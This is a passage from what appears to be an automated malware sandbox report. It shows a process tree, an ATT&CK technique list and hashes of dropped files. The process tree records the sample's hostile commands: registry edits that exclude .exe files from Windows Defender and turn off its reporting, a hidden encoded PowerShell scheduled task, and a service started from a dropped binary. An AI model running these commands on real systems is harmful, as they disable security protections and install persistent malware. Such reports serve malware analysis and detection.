- Kills process with taskkill
PID:7636

C:\Users\Admin\Documents\SjMB2J9g8cphqnNi_zygK4Oo.exe
"C:\Users\Admin\Documents\SjMB2J9g8cphqnNi_zygK4Oo.exe"
3⤵
PID:5456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 460
4⤵
- Program crash
PID:5420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 480
4⤵
- Program crash
PID:5644

C:\Users\Admin\Documents\SCpwVkP0N8CNKXIcqAhl4YoB.exe
"C:\Users\Admin\Documents\SCpwVkP0N8CNKXIcqAhl4YoB.exe"
3⤵
PID:5448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 460
4⤵
- Program crash
PID:6192

C:\Users\Admin\Documents\vLSwaKyRRInm2t3Yr2GMu8oX.exe
"C:\Users\Admin\Documents\vLSwaKyRRInm2t3Yr2GMu8oX.exe"
3⤵
PID:5440

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
PID:6360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 956
4⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:3488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 1020
4⤵
- Program crash
PID:6412

C:\Users\Admin\Documents\4lWOlxNFLZxTACfGzG4eVgxf.exe
"C:\Users\Admin\Documents\4lWOlxNFLZxTACfGzG4eVgxf.exe"
3⤵
PID:5300

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
4⤵
PID:5324

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:6972

C:\Users\Admin\Documents\U8kgry6zmeUI3JjD8YmFllhE.exe
"C:\Users\Admin\Documents\U8kgry6zmeUI3JjD8YmFllhE.exe"
3⤵
PID:5280

C:\Users\Admin\Documents\nEvUUB02by6CzIuVSbNYvW14.exe
"C:\Users\Admin\Documents\nEvUUB02by6CzIuVSbNYvW14.exe"
3⤵
PID:5996

C:\Users\Admin\AppData\Local\Temp\7zSEC42.tmp\Install.exe
.\Install.exe
4⤵
PID:6328

C:\Users\Admin\AppData\Local\Temp\7zS1C2B.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:6600

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:7480

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:7752

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:4832

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:7172

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:8136

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:6792

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gUtaLpOeZ" /SC once /ST 07:35:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:6292

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gUtaLpOeZ"
6⤵
PID:1268

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
PID:1936

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1716

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:2676

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:3568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 600
3⤵
- Program crash
PID:4292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3568 -ip 3568
1⤵
PID:4024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4312 -ip 4312
1⤵
PID:4380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
PID:1272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 544 -ip 544
1⤵
PID:4144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3868 -ip 3868
1⤵
PID:2648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:4312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5364 -ip 5364
1⤵
PID:6092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5456 -ip 5456
1⤵
PID:6140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5448 -ip 5448
1⤵
PID:5204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5556 -ip 5556
1⤵
PID:5424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5564 -ip 5564
1⤵
PID:6276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5564 -ip 5564
1⤵
PID:7076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5556 -ip 5556
1⤵
PID:6584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5184 -ip 5184
1⤵
PID:7056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3712 -ip 3712
1⤵
PID:7040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 5440 -ip 5440
1⤵
PID:6568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3712 -ip 3712
1⤵
PID:4044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5184 -ip 5184
1⤵
PID:7156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 4608 -ip 4608
1⤵
PID:7056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 3628 -ip 3628
1⤵
PID:6300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5364 -ip 5364
1⤵
PID:5716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 3628 -ip 3628
1⤵
PID:6452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4608 -ip 4608
1⤵
PID:400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5456 -ip 5456
1⤵
PID:6532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 5448 -ip 5448
1⤵
PID:6768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 6876 -ip 6876
1⤵
PID:5432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 6876 -ip 6876
1⤵
PID:3040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6876 -ip 6876
1⤵
PID:6004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6876 -ip 6876
1⤵
PID:5252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5564 -ip 5564
1⤵
PID:5628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 5740 -ip 5740
1⤵
PID:6004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 2220 -ip 2220
1⤵
PID:7028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5440 -ip 5440
1⤵
PID:5744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5564 -ip 5564
1⤵
PID:5976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 6876 -ip 6876
1⤵
PID:7236

C:\Windows\SysWOW64\jnjrknf\obxzwabi.exe
C:\Windows\SysWOW64\jnjrknf\obxzwabi.exe /d"C:\Users\Admin\Documents\d_QfVgpnVVMnP7iWo6bBRXX6.exe"
1⤵
PID:7276

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Windows\TEMP\llsxdwfc.exe" C:\Windows\SysWOW64\jnjrknf\
2⤵
PID:8088

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config jnjrknf binPath= "C:\Windows\SysWOW64\jnjrknf\llsxdwfc.exe /d\"C:\Windows\SysWOW64\jnjrknf\obxzwabi.exe\""
2⤵
PID:3432

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start jnjrknf
2⤵
PID:3612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 6860 -ip 6860
1⤵
PID:4560

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 628 -p 7868 -ip 7868
1⤵
PID:6688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2220 -ip 2220
1⤵
PID:7180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 5440 -ip 5440
1⤵
PID:7348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 8148 -ip 8148
1⤵
PID:7520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 8140 -ip 8140
1⤵
PID:3712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 6084 -ip 6084
1⤵
PID:7724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 7276 -ip 7276
1⤵
PID:6088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 7472 -ip 7472
1⤵
PID:5472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 7472 -ip 7472
1⤵
PID:6676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 7472 -ip 7472
1⤵
PID:5424

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

New Service

T1050

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
MD5
637481df32351129e60560d5a5c100b5

SHA1
a46aee6e5a4a4893fba5806bcc14fc7fb3ce80ae

SHA256
1f1029d94ca4656a577d554cedd79d447658f475af08620084897a5523587052

SHA512
604bfd0a78a57dfddd45872803501ad89491e37e89e0778b0f13644fa9164ff509955a57469dfdd65a05bbedaf0acb669f68430e84800d17efe7d360a70569e3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
b50364f4cd959eaad49796990310386a

SHA1
3018e64eefcde33276fe7c49a19d15cbcbb7ae79

SHA256
8306839faa2d845eb31cfdcc53fb99e00ff42af50318fd258be9b4e253f0ab7a

SHA512
d4d30eada8585eb3d7fdabe8c45fd4884d5db3177676749ec5e81d2f4b49db30c4aca11012fe9eb7bf792c536240ca3252ce6e98d34b91bdcd0c572e8abc01e5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
MD5
5d7692d6db2f04531dc545e7b2f874d6

SHA1
7263b12e1a9eaee55a79cd34870ce9d9341c897c

SHA256
e8bbf8c1f64c411a3fe50807a7c20d543bb8ecece7ca1e5889201ec42f214276

SHA512
071042eddd7b13f70283ce89e64d9b46eb7f1ae2a732a0cd6e0c8dbfdc7806bebb3a24a27f0e7dd1a11e9b8e369365003dc571deca12d2ffebdb7c9014546381

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MAMbrowser.exe.log
MD5
e5352797047ad2c91b83e933b24fbc4f

SHA1
9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772

SHA256
b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c

SHA512
dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

Download Submit
C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
MD5
6d997a345651126bf81cfa573268ef6b

SHA1
04813a5732d71d719430e43c34eb5c6ad10695ab

SHA256
55a0f9afd26e0b723a91d7198ff10309380831787eaa661c0d3875439ac7c9b3

SHA512
988da4a0ff8340fc0d6f23e4fa9f361ebc6d48707363a113d45f76fd3172decc2428f7c5149eeba67fa97aeb8c0fffd15a787da0a39b9b324a6158c32d9b674d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
MD5
6d997a345651126bf81cfa573268ef6b

SHA1
04813a5732d71d719430e43c34eb5c6ad10695ab

SHA256
55a0f9afd26e0b723a91d7198ff10309380831787eaa661c0d3875439ac7c9b3

SHA512
988da4a0ff8340fc0d6f23e4fa9f361ebc6d48707363a113d45f76fd3172decc2428f7c5149eeba67fa97aeb8c0fffd15a787da0a39b9b324a6158c32d9b674d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Complete.exe
MD5
92acb4017f38a7ee6c5d2f6ef0d32af2

SHA1
1b932faf564f18ccc63e5dabff5c705ac30a61b8

SHA256
2459694049abfe227ddcf5b4d813fe3ae8e1e9066de5228acf20c958d425c2e1

SHA512
d385b2857d934628e1df3ef493b3a33e2a042c5974d9c153c126a86a28fc61bcc02db0a0791c225378994737a16cd35b74f217600d4b837cda779200c9faeb73

Download Submit
C:\Users\Admin\AppData\Local\Temp\Complete.exe
MD5
92acb4017f38a7ee6c5d2f6ef0d32af2

SHA1
1b932faf564f18ccc63e5dabff5c705ac30a61b8

SHA256
2459694049abfe227ddcf5b4d813fe3ae8e1e9066de5228acf20c958d425c2e1

SHA512
d385b2857d934628e1df3ef493b3a33e2a042c5974d9c153c126a86a28fc61bcc02db0a0791c225378994737a16cd35b74f217600d4b837cda779200c9faeb73

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Info.exe
MD5
e60652bcb97b0be3c41fc28b051b68e2

SHA1
028d439fb964de1d4da81585fd3eead047ebaafa

SHA256
455d69104948a6e6786f4c98625a417448df7c9136f933d604d0ec4ea8f4173f

SHA512
7d4aa622a4b092c4a1f2350f8e6c72c911d047b218dd2388ae94fdae83159c61990b5902d9889a71d34696ad9fab98b88dc201c10049925df0bc4b7fb26dc790

Download Submit
C:\Users\Admin\AppData\Local\Temp\Info.exe
MD5
e60652bcb97b0be3c41fc28b051b68e2

SHA1
028d439fb964de1d4da81585fd3eead047ebaafa

SHA256
455d69104948a6e6786f4c98625a417448df7c9136f933d604d0ec4ea8f4173f

SHA512
7d4aa622a4b092c4a1f2350f8e6c72c911d047b218dd2388ae94fdae83159c61990b5902d9889a71d34696ad9fab98b88dc201c10049925df0bc4b7fb26dc790

Download Submit
C:\Users\Admin\AppData\Local\Temp\Info.exe
MD5
e60652bcb97b0be3c41fc28b051b68e2

SHA1
028d439fb964de1d4da81585fd3eead047ebaafa

SHA256
455d69104948a6e6786f4c98625a417448df7c9136f933d604d0ec4ea8f4173f

SHA512
7d4aa622a4b092c4a1f2350f8e6c72c911d047b218dd2388ae94fdae83159c61990b5902d9889a71d34696ad9fab98b88dc201c10049925df0bc4b7fb26dc790

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
MD5
8b3419852524534817c7a38d8b64a599

SHA1
eb9a60cc48452182c6da3fa9b995f4361af4737b

SHA256
e6c104ae73204e9133bd65be90bb55869801076971d0b99c64a0c261574fa2f1

SHA512
c4ad198f3cbace842af1f9686f9761964b50f9a7be77b873c11c24d1b9bd57d4ca03a8a4519ce52b30e913475a0fc6d58dee7e54b1c3693dea69029cde0346ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
MD5
8b3419852524534817c7a38d8b64a599

SHA1
eb9a60cc48452182c6da3fa9b995f4361af4737b

SHA256
e6c104ae73204e9133bd65be90bb55869801076971d0b99c64a0c261574fa2f1

SHA512
c4ad198f3cbace842af1f9686f9761964b50f9a7be77b873c11c24d1b9bd57d4ca03a8a4519ce52b30e913475a0fc6d58dee7e54b1c3693dea69029cde0346ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
MD5
a2f849910c66e106450e70ac2853aede

SHA1
1059dd8f690d6de7ad66e42f40683b880a840394

SHA256
51e7dc76fac9d22ef0a57cf4f0c43918d32cf56f8b33815584e237fd16d84df6

SHA512
6f5bb00e7873996a4561c237e148993800b00ac3953ca804abf2a5373dfda413a015727ce844330055b738dab6ccd73d6928a4a887d55c2fd0bea9b3209c4a76

Download Submit
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
MD5
a2f849910c66e106450e70ac2853aede

SHA1
1059dd8f690d6de7ad66e42f40683b880a840394

SHA256
51e7dc76fac9d22ef0a57cf4f0c43918d32cf56f8b33815584e237fd16d84df6

SHA512
6f5bb00e7873996a4561c237e148993800b00ac3953ca804abf2a5373dfda413a015727ce844330055b738dab6ccd73d6928a4a887d55c2fd0bea9b3209c4a76

Download Submit
C:\Users\Admin\AppData\Local\Temp\Litever01.exe
MD5
2fcaae73e80aefac093facddf4e25014

SHA1
02dbe04b2f1068cb786c499dfcf34895607f554d

SHA256
a0983e1772cefbf3e5695078124fb00d4333362b19a59a799811ffd2ccc2db5e

SHA512
218e313c2d60aa4985d3759388b3bc365a74fe718be07d3b747fdb7d073fbbc66668e4a486f2d8aaeae8242700a4f60c371f40721ffd97facfb19c06e2710b09

Download Submit
C:\Users\Admin\AppData\Local\Temp\Litever01.exe
MD5
2fcaae73e80aefac093facddf4e25014

SHA1
02dbe04b2f1068cb786c499dfcf34895607f554d

SHA256
a0983e1772cefbf3e5695078124fb00d4333362b19a59a799811ffd2ccc2db5e

SHA512
218e313c2d60aa4985d3759388b3bc365a74fe718be07d3b747fdb7d073fbbc66668e4a486f2d8aaeae8242700a4f60c371f40721ffd97facfb19c06e2710b09

Download Submit
C:\Users\Admin\AppData\Local\Temp\MAMbrowser.exe
MD5
e8ea3722ef7fbc675e57e9f9868b0848

SHA1
e3c89ccad911a24ef522fbc798f835a8c208ba58

SHA256
3a5d378b3f3b3fc623483cb2af534ae6b9285f8e54c426e6780d34a0d9a3a2b2

SHA512
71dbed7f427d4693cdb308a19950f5edbfc3a6ef7c53cbb2085ab74a458bb30c1e11b798ad79f2d79062166776ffd70dc2f76834516f369f29f36cea61a94801

Download Submit
C:\Users\Admin\AppData\Local\Temp\MAMbrowser.exe
MD5
e8ea3722ef7fbc675e57e9f9868b0848

SHA1
e3c89ccad911a24ef522fbc798f835a8c208ba58

SHA256
3a5d378b3f3b3fc623483cb2af534ae6b9285f8e54c426e6780d34a0d9a3a2b2

SHA512
71dbed7f427d4693cdb308a19950f5edbfc3a6ef7c53cbb2085ab74a458bb30c1e11b798ad79f2d79062166776ffd70dc2f76834516f369f29f36cea61a94801

Download Submit
C:\Users\Admin\AppData\Local\Temp\MAMbrowser.exe
MD5
e8ea3722ef7fbc675e57e9f9868b0848

SHA1
e3c89ccad911a24ef522fbc798f835a8c208ba58

SHA256
3a5d378b3f3b3fc623483cb2af534ae6b9285f8e54c426e6780d34a0d9a3a2b2

SHA512
71dbed7f427d4693cdb308a19950f5edbfc3a6ef7c53cbb2085ab74a458bb30c1e11b798ad79f2d79062166776ffd70dc2f76834516f369f29f36cea61a94801

Download Submit
C:\Users\Admin\AppData\Local\Temp\MAMbrowser.exe
MD5
e8ea3722ef7fbc675e57e9f9868b0848

SHA1
e3c89ccad911a24ef522fbc798f835a8c208ba58

SHA256
3a5d378b3f3b3fc623483cb2af534ae6b9285f8e54c426e6780d34a0d9a3a2b2

SHA512
71dbed7f427d4693cdb308a19950f5edbfc3a6ef7c53cbb2085ab74a458bb30c1e11b798ad79f2d79062166776ffd70dc2f76834516f369f29f36cea61a94801

Download Submit
C:\Users\Admin\AppData\Local\Temp\axhub.dat
MD5
5fd2eba6df44d23c9e662763009d7f84

SHA1
43530574f8ac455ae263c70cc99550bc60bfa4f1

SHA256
2991e2231855661e94ef80a4202487a9d7dc7bebccab9a0b2a786cf0783a051f

SHA512
321a86725e533dedb5b74e17218e6e53a49fa6ffc87d7f7da0f0b8441a081fe785f7846a76f67ef03ec3abddacbe8906b20a2f3ce8178896ec57090ef7ab0eb7

Download Submit
C:\Users\Admin\AppData\Local\Temp\axhub.dll
MD5
1c7be730bdc4833afb7117d48c3fd513

SHA1
dc7e38cfe2ae4a117922306aead5a7544af646b8

SHA256
8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

SHA512
7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\axhub.dll
MD5
1c7be730bdc4833afb7117d48c3fd513

SHA1
dc7e38cfe2ae4a117922306aead5a7544af646b8

SHA256
8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

SHA512
7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\cleanpro22.exe
MD5
92b1bc1ca0ed644174bcbda4b6fda42a

SHA1
5f360458c9136dde50cd57f6597fa830f357c03c

SHA256
ec0c3292b6fc63bac0e3900ef0b86c49b505f1461c5103fc97f107af60303f96

SHA512
79b34706cf80f9713eb24384d002901a7cb26a5d1fbbe73523944b30c83352fdee3bc7e7d83dc9c04274ac9b1fe22e295500179a4f90214e5471f68799a48aba

Download Submit
C:\Users\Admin\AppData\Local\Temp\cleanpro22.exe
MD5
92b1bc1ca0ed644174bcbda4b6fda42a

SHA1
5f360458c9136dde50cd57f6597fa830f357c03c

SHA256
ec0c3292b6fc63bac0e3900ef0b86c49b505f1461c5103fc97f107af60303f96

SHA512
79b34706cf80f9713eb24384d002901a7cb26a5d1fbbe73523944b30c83352fdee3bc7e7d83dc9c04274ac9b1fe22e295500179a4f90214e5471f68799a48aba

Download Submit
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
MD5
b7161c0845a64ff6d7345b67ff97f3b0

SHA1
d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

SHA256
fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

SHA512
98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

Download Submit
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
MD5
cb6184df94bc7132c456250a3428699a

SHA1
965a92174a45e1f334007e40f2e7d2f833d6fd63

SHA256
